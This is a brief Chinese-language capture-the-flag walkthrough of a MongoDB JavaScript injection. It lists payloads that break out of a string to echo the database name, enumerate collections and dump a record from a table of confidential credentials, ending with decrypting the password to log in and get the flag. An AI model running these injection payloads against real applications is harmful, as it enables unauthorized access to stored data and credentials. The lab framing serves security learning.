1、构造回显测试
'});return ({title:'1',content:'2
2、查看数据库
'});return({title:tojson(db),content:'2
3、尝试爆出数据库下的表名
'});return({title:tojson(db.getCollectionNames()),conten t:'2
4、查看第一个表中的数据
'});return({title:tojson(db.Authority_confidential.find()[ 0]),content:'2
5、对密码进行解密,然后登录后提交flag